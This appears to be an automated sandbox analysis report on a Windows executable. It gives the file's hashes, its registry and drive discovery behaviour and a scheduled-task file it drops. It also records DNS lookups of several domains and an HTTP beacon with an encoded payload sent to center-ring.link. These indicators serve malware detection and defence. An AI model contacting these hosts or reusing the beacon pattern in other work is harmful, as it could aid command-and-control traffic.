2425edf35bde090fd2bdbf4179b9dcc9b396b2249bae6eeaf1c49c3f67577190

General

Target

5cb202408ddf2b8a8b94a86013e4df88.exe
Size

325KB
MD5

5cb202408ddf2b8a8b94a86013e4df88
SHA1

73123c5453c9fa590ae86bf512ffd39c0691a520
SHA256

2425edf35bde090fd2bdbf4179b9dcc9b396b2249bae6eeaf1c49c3f67577190
SHA512

6587cda684fd5aac03ed968d9340461099824f582947e246767508f6f5983c56d35b5c480eadc2362facf271ea32e2da08e12620b85842c8f739d4be6ac62c9d
SSDEEP

6144:KQl313aAKsdIT+LmZmz6dQ0np2q17TqnX4iPednUYg2r3dV:zlF3Mn6LY+0npX1inX4uO3dV

Score

6^/10

discovery

Malware Config

Signatures

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\disk\enum	5cb202408ddf2b8a8b94a86013e4df88.exe
Key value enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	5cb202408ddf2b8a8b94a86013e4df88.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\EasyMeditate.job	5cb202408ddf2b8a8b94a86013e4df88.exe

C:\Users\Admin\AppData\Local\Temp\5cb202408ddf2b8a8b94a86013e4df88.exe
"C:\Users\Admin\AppData\Local\Temp\5cb202408ddf2b8a8b94a86013e4df88.exe"
1⤵
- Maps connected drives based on registry
- Drops file in Windows directory
PID:2084

Network

DNS

parentmodel.biz

5cb202408ddf2b8a8b94a86013e4df88.exe

Remote address:

8.8.8.8:53

Request

parentmodel.biz

IN A

Response
DNS

parentmodel.biz

5cb202408ddf2b8a8b94a86013e4df88.exe

Remote address:

8.8.8.8:53

Request

parentmodel.biz

IN A
DNS

parentmodel.biz

5cb202408ddf2b8a8b94a86013e4df88.exe

Remote address:

8.8.8.8:53

Request

parentmodel.biz

IN A
DNS

allmodel-pro.com

5cb202408ddf2b8a8b94a86013e4df88.exe

Remote address:

8.8.8.8:53

Request

allmodel-pro.com

IN A

Response
DNS

first-usapro.info

5cb202408ddf2b8a8b94a86013e4df88.exe

Remote address:

8.8.8.8:53

Request

first-usapro.info

IN A

Response
DNS

first-usapro.info

5cb202408ddf2b8a8b94a86013e4df88.exe

Remote address:

8.8.8.8:53

Request

first-usapro.info

IN A

Response
DNS

center-ring.link

5cb202408ddf2b8a8b94a86013e4df88.exe

Remote address:

8.8.8.8:53

Request

center-ring.link

IN A

Response

center-ring.link

IN A

45.33.20.235

center-ring.link

IN A

72.14.178.174

center-ring.link

IN A

72.14.185.43

center-ring.link

IN A

45.33.18.44

center-ring.link

IN A

96.126.123.244

center-ring.link

IN A

198.58.118.167

center-ring.link

IN A

45.33.30.197

center-ring.link

IN A

45.79.19.196

center-ring.link

IN A

45.56.79.23

center-ring.link

IN A

45.33.2.79

center-ring.link

IN A

173.255.194.134

center-ring.link

IN A

45.33.23.183
GET

http://center-ring.link/?q=DALni6yu0u1H3e%2BlhaZkXi%2Fwik1%2FZCM8fJekxzShl1ZJA%2BcCxuDC8SUDHGoYMlFmQCdI6XkKjA6USieIoeO15pQUL5czpUQ6fkB2sHeET2IfjcPT9BH58EKq1uHUqiYuyOnLmpYkKgN0%2Fk1EAm43osZV04lRBv1eoZrKil7nwe%2B1vo7Qg9TMSq7LE03ee5HY2TqFvtmnmxp3rY1H7lmpEu0kiejvM6KlcwIF8%2Fg8x33Nu4h5v5r7GuAyRHUggjOYPAW2GihQZQ8%2FiN4FCmNHNWYsbD7qv83rCXoCwZv%2BxocigK%2FfiyLpCMz4TI9wQUlTcQdGG4lDlKittYAdN9F9twA5zJDc%2BK7twoqP%2FnVMAZgFiyzs1arLjKbqbr

5cb202408ddf2b8a8b94a86013e4df88.exe

Remote address:

45.33.20.235:80

Request

GET /?q=DALni6yu0u1H3e%2BlhaZkXi%2Fwik1%2FZCM8fJekxzShl1ZJA%2BcCxuDC8SUDHGoYMlFmQCdI6XkKjA6USieIoeO15pQUL5czpUQ6fkB2sHeET2IfjcPT9BH58EKq1uHUqiYuyOnLmpYkKgN0%2Fk1EAm43osZV04lRBv1eoZrKil7nwe%2B1vo7Qg9TMSq7LE03ee5HY2TqFvtmnmxp3rY1H7lmpEu0kiejvM6KlcwIF8%2Fg8x33Nu4h5v5r7GuAyRHUggjOYPAW2GihQZQ8%2FiN4FCmNHNWYsbD7qv83rCXoCwZv%2BxocigK%2FfiyLpCMz4TI9wQUlTcQdGG4lDlKittYAdN9F9twA5zJDc%2BK7twoqP%2FnVMAZgFiyzs1arLjKbqbr HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: center-ring.link

Response

HTTP/1.1 200 OK

server: openresty/1.13.6.1
date: Sat, 06 Jan 2024 04:01:51 GMT
content-type: text/html
transfer-encoding: chunked
connection: close

45.33.20.235:80

http://center-ring.link/?q=DALni6yu0u1H3e%2BlhaZkXi%2Fwik1%2FZCM8fJekxzShl1ZJA%2BcCxuDC8SUDHGoYMlFmQCdI6XkKjA6USieIoeO15pQUL5czpUQ6fkB2sHeET2IfjcPT9BH58EKq1uHUqiYuyOnLmpYkKgN0%2Fk1EAm43osZV04lRBv1eoZrKil7nwe%2B1vo7Qg9TMSq7LE03ee5HY2TqFvtmnmxp3rY1H7lmpEu0kiejvM6KlcwIF8%2Fg8x33Nu4h5v5r7GuAyRHUggjOYPAW2GihQZQ8%2FiN4FCmNHNWYsbD7qv83rCXoCwZv%2BxocigK%2FfiyLpCMz4TI9wQUlTcQdGG4lDlKittYAdN9F9twA5zJDc%2BK7twoqP%2FnVMAZgFiyzs1arLjKbqbr

http

5cb202408ddf2b8a8b94a86013e4df88.exe

867 B
1.5kB
7
4

HTTP Request

GET http://center-ring.link/?q=DALni6yu0u1H3e%2BlhaZkXi%2Fwik1%2FZCM8fJekxzShl1ZJA%2BcCxuDC8SUDHGoYMlFmQCdI6XkKjA6USieIoeO15pQUL5czpUQ6fkB2sHeET2IfjcPT9BH58EKq1uHUqiYuyOnLmpYkKgN0%2Fk1EAm43osZV04lRBv1eoZrKil7nwe%2B1vo7Qg9TMSq7LE03ee5HY2TqFvtmnmxp3rY1H7lmpEu0kiejvM6KlcwIF8%2Fg8x33Nu4h5v5r7GuAyRHUggjOYPAW2GihQZQ8%2FiN4FCmNHNWYsbD7qv83rCXoCwZv%2BxocigK%2FfiyLpCMz4TI9wQUlTcQdGG4lDlKittYAdN9F9twA5zJDc%2BK7twoqP%2FnVMAZgFiyzs1arLjKbqbr

HTTP Response

200

8.8.8.8:53

parentmodel.biz

dns

5cb202408ddf2b8a8b94a86013e4df88.exe

183 B
123 B
3
1

DNS Request

parentmodel.biz

DNS Request

parentmodel.biz

DNS Request

parentmodel.biz
8.8.8.8:53

allmodel-pro.com

dns

5cb202408ddf2b8a8b94a86013e4df88.exe

62 B
135 B
1
1

DNS Request

allmodel-pro.com
8.8.8.8:53

first-usapro.info

dns

5cb202408ddf2b8a8b94a86013e4df88.exe

126 B
284 B
2
2

DNS Request

first-usapro.info

DNS Request

first-usapro.info
8.8.8.8:53

center-ring.link

dns

5cb202408ddf2b8a8b94a86013e4df88.exe

62 B
254 B
1
1

DNS Request

center-ring.link

DNS Response

45.33.20.235

72.14.178.174

72.14.185.43

45.33.18.44

96.126.123.244

198.58.118.167

45.33.30.197

45.79.19.196

45.56.79.23

45.33.2.79

173.255.194.134

45.33.23.183

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2084-1-0x0000000001200000-0x0000000001240000-memory.dmp

Filesize
256KB

Download
memory/2084-2-0x0000000000370000-0x000000000039F000-memory.dmp

Filesize
188KB

Download
memory/2084-9-0x0000000000310000-0x0000000000337000-memory.dmp

Filesize
156KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.